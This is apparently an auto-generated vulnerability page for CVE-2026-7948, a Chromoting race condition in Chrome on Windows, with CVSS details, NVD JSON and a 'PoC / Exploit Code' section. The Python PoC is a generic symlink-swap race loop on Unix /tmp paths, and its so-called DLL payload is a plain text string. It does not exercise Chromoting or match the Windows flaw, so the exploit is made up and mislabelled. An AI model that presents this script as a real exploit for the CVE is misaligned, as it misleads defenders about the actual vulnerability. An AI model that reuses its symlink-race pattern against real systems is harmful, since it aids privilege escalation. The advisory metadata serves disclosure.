Security Vulnerability Report
中文
CVE-2026-7948 CVSS 7.5 HIGH

CVE-2026-7948

Published: 2026-05-06 19:16:43
Last Modified: 2026-05-07 02:08:50

Description

Race in Chromoting in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: Medium)

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 148.0.7778.96 (Windows)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os import time # Conceptual PoC for Race Condition in Chromoting # This script simulates a TOCTOU attack often used in privilege escalation # It attempts to swap a legitimate file with a malicious symlink before the check is complete. MALICIOUS_FILE = "/tmp/malicious_payload.dll" TARGET_FILE = "/tmp/legitimate_config.dat" def exploit_race_condition(): print("[*] Starting race condition exploit simulation...") # Attacker prepares the malicious file with open(MALICIOUS_FILE, 'w') as f: f.write("Malicious Code Execution") try: while True: # Step 1: Attacker creates a symlink to a privileged location # simulating the race window during Chromoting file check os.symlink(MALICIOUS_FILE, TARGET_FILE) print("[+] Symlink created, attempting to trigger vulnerability...") # Simulate the small time window where the application checks the file time.sleep(0.001) # In a real scenario, the application would load TARGET_FILE here # Due to the race, it loads the MALICIOUS_FILE with higher privileges # Cleanup for simulation loop os.remove(TARGET_FILE) except KeyboardInterrupt: print("[!] Exploit simulation stopped.") if __name__ == "__main__": exploit_race_condition()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7948", "sourceIdentifier": "[email protected]", "published": "2026-05-06T19:16:43.113", "lastModified": "2026-05-07T02:08:49.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Race in Chromoting in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "148.0.7778.96", "matchCriteriaId": "5E9416A8-4333-4195-983C-78F521AF6245"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://issues.chromium.org/issues/496193452", "source": "[email protected]", "tags": ["Permissions Required"]}]}}